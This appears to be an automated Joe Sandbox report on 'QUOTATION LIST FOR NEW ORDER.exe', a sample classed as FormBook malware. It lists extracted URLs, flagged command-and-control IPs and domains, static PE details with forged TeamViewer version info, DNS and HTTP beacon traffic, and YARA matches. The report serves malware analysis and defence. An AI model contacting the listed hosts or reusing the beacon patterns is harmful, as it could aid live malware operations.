                                            http://www.jiyu-kobo.co.jp/GQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.carterandcone.com-sQE1s/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/xSQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.comtoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comaQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comessed3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.jiyu-kobo.co.jp/sQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/rQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comcomFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.comoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comalsQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.dejQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
204.11.58.233 | everesttechsolutions.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
47.222.2.124 | www.quotovate.com | United States | 19108 | SUDDENLINK-COMMUNICATIONSUS | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458798
Start date: 03.08.2021
Start time: 18:53:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: QUOTATION LIST FOR NEW ORDER.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@5/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 58.7% (good quality ratio 52%)
• Quality average: 69.8%
• Quality standard deviation: 33.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 23.211.4.86
• Excluded domains from analysis (whitelisted): fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolcus15.cloudapp.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
18:54:49 | API Interceptor | 1x Sleep call for process: QUOTATION LIST FOR NEW ORDER.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
204.11.58.233 | Invoice #210722 14,890 $.exe | | malicious | | www.everesttechsolutions.com/p4se/?Xl=8ptXsvhhshn&j8kTd=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVnZFxvELJI1b

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.log
Process: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.773783545447779
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:QUOTATION LIST FOR NEW ORDER.exe
                                                      File size:1347072
                                                      MD5:2a28a3e032a65c25b90f193621b623af
                                                      SHA1:019659bb43b5535a9684d9938aa73e98682b0a61
                                                      SHA256:317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
                                                      SHA512:c6aa00f5777d5e0d2f687aaaae1ac8bb9b1689729688088fcde0707c060b8e96b46a133b47d586cb852b277f64b8ce9fd68578d9c25c7f6b702023534494646d
                                                      SSDEEP:24576:wogS/d3ZYdke1b0AIM2Jga9lY7uEmJmwRGPoN7vdiTbnFM:YdvXl9jim/PoiM
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..a..............P.................. ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x54a0de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x6103A829 [Fri Jul 30 07:20:09 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]

                                                      Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14a08c | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14c000 | 0x5c8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14e000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                      Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x148344 | 0x148400 | False | 0.862922011853 | data | 7.77803780051 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x14c000 | 0x5c8 | 0x600 | False | 0.440104166667 | data | 4.16475165345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x14e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                                                      Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x14c090 | 0x338 | data | | |
| RT_MANIFEST | 0x14c3d8 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | |

                                                      Imports

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

                                                      Version Infos

| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | TeamViewer 2021 (C) |
| Assembly Version | 4.2.2.0 |
| InternalName | Tup.exe |
| FileVersion | 4.3.0.6 |
| CompanyName | TeamViewer GmBh |
| LegalTrademarks | |
| Comments | |
| ProductName | Game Picture |
| ProductVersion | 4.3.0.6 |
| FileDescription | Game Picture |
| OriginalFilename | Tup.exe |

                                                      Network Behavior

                                                      Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 08/03/21-18:56:13.121292 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.7 | 8.8.8.8 |
| 08/03/21-18:56:14.482122 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.7 | 8.8.8.8 |

                                                      Network Port Distribution

                                                      TCP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 3, 2021 18:56:03.276704073 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:03.426737070 CEST | 80 | 49704 | 204.11.58.233 | 192.168.2.7 |
| Aug 3, 2021 18:56:03.426877022 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:03.427073956 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:03.577406883 CEST | 80 | 49704 | 204.11.58.233 | 192.168.2.7 |
| Aug 3, 2021 18:56:03.918870926 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:04.099133015 CEST | 80 | 49704 | 204.11.58.233 | 192.168.2.7 |
| Aug 3, 2021 18:56:06.000478029 CEST | 80 | 49704 | 204.11.58.233 | 192.168.2.7 |
| Aug 3, 2021 18:56:06.000588894 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:06.001934052 CEST | 80 | 49704 | 204.11.58.233 | 192.168.2.7 |
| Aug 3, 2021 18:56:06.002037048 CEST | 49704 | 80 | 192.168.2.7 | 204.11.58.233 |
| Aug 3, 2021 18:56:17.167814970 CEST | 49705 | 80 | 192.168.2.7 | 47.222.2.124 |
| Aug 3, 2021 18:56:20.169933081 CEST | 49705 | 80 | 192.168.2.7 | 47.222.2.124 |
| Aug 3, 2021 18:56:26.170384884 CEST | 49705 | 80 | 192.168.2.7 | 47.222.2.124 |

                                                      UDP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Aug 3, 2021 18:54:13.497689009 CEST | 63354 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:13.523097038 CEST | 53 | 63354 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:14.489391088 CEST | 53129 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:14.517411947 CEST | 53 | 53129 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:15.328059912 CEST | 62452 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:15.353789091 CEST | 53 | 62452 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:16.167668104 CEST | 57820 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:16.193391085 CEST | 53 | 57820 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:17.116626024 CEST | 50848 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:17.141563892 CEST | 53 | 50848 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:18.160233021 CEST | 61242 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:18.193016052 CEST | 53 | 61242 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:19.019804955 CEST | 58562 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:19.047405958 CEST | 53 | 58562 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:21.165599108 CEST | 56590 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:21.194493055 CEST | 53 | 56590 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:22.194313049 CEST | 60501 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:22.363729954 CEST | 53 | 60501 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:23.168865919 CEST | 53775 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:23.197211027 CEST | 53 | 53775 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:24.453998089 CEST | 51837 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:24.486718893 CEST | 53 | 51837 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:25.805160046 CEST | 55411 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:25.833256960 CEST | 53 | 55411 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:28.530322075 CEST | 63668 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:28.555107117 CEST | 53 | 63668 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:29.475338936 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:29.507994890 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:30.312120914 CEST | 58739 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:30.340039968 CEST | 53 | 58739 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:31.420591116 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:31.455758095 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:32.760993958 CEST | 58717 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:32.785573006 CEST | 53 | 58717 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:54:33.714972019 CEST | 59762 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:54:33.749150038 CEST | 53 | 59762 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:56:03.089462996 CEST | 54329 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:56:03.265300035 CEST | 53 | 54329 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:56:08.939980984 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:56:09.950802088 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:56:11.309310913 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:56:12.105026007 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:56:13.117250919 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:56:14.478785992 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7 |
| Aug 3, 2021 18:56:17.127902985 CEST | 54008 | 53 | 192.168.2.7 | 8.8.8.8 |
| Aug 3, 2021 18:56:17.165973902 CEST | 53 | 54008 | 8.8.8.8 | 192.168.2.7 |

                                                      ICMP Packets

| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Aug 3, 2021 18:56:13.121292114 CEST | 192.168.2.7 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable |
| Aug 3, 2021 18:56:14.482121944 CEST | 192.168.2.7 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable |

                                                      DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Aug 3, 2021 18:56:03.089462996 CEST | 192.168.2.7 | 8.8.8.8 | 0x45f3 | Standard query (0) | www.everesttechsolutions.com | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:08.939980984 CEST | 192.168.2.7 | 8.8.8.8 | 0xa17f | Standard query (0) | www.tomio.tech | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:09.950802088 CEST | 192.168.2.7 | 8.8.8.8 | 0xa17f | Standard query (0) | www.tomio.tech | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:11.309310913 CEST | 192.168.2.7 | 8.8.8.8 | 0xa17f | Standard query (0) | www.tomio.tech | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:17.127902985 CEST | 192.168.2.7 | 8.8.8.8 | 0x872c | Standard query (0) | www.quotovate.com | A (IP address) | IN (0x0001) |

                                                      DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Aug 3, 2021 18:56:03.265300035 CEST | 8.8.8.8 | 192.168.2.7 | 0x45f3 | No error (0) | www.everesttechsolutions.com | everesttechsolutions.com | | CNAME (Canonical name) | IN (0x0001) |
| Aug 3, 2021 18:56:03.265300035 CEST | 8.8.8.8 | 192.168.2.7 | 0x45f3 | No error (0) | everesttechsolutions.com | | 204.11.58.233 | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:12.105026007 CEST | 8.8.8.8 | 192.168.2.7 | 0xa17f | Server failure (2) | www.tomio.tech | none | none | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:13.117250919 CEST | 8.8.8.8 | 192.168.2.7 | 0xa17f | Server failure (2) | www.tomio.tech | none | none | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:14.478785992 CEST | 8.8.8.8 | 192.168.2.7 | 0xa17f | Server failure (2) | www.tomio.tech | none | none | A (IP address) | IN (0x0001) |
| Aug 3, 2021 18:56:17.165973902 CEST | 8.8.8.8 | 192.168.2.7 | 0x872c | No error (0) | www.quotovate.com | | 47.222.2.124 | A (IP address) | IN (0x0001) |

                                                      HTTP Request Dependency Graph

                                                      • www.everesttechsolutions.com

                                                      HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49704 | 204.11.58.233 | 80 | C:\Windows\explorer.exe |

Timestamp: Aug 3, 2021 18:56:03.427073956 CEST, kBytes transferred: 405, Direction: OUT

GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1
Host: www.everesttechsolutions.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Aug 3, 2021 18:56:06.000478029 CEST, kBytes transferred: 407, Direction: IN

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Aug 2021 16:56:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Redirect-By: WordPress
Set-Cookie: PHPSESSID=f818a483df7096bf3685fb921c9165a5; path=/
Upgrade: h2,h2c
Connection: Upgrade, close
Location: https://everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==
Referrer-Policy: no-referrer-when-downgrade
Content-Length: 0
Content-Type: text/html; charset=UTF-8


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior


                                                      System Behavior

                                                      General

                                                      Start time:18:54:22
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x580000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:low

                                                      General

                                                      Start time:18:54:50
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x90000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      General

                                                      Start time:18:54:51
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
                                                      Imagebase:0x590000
                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
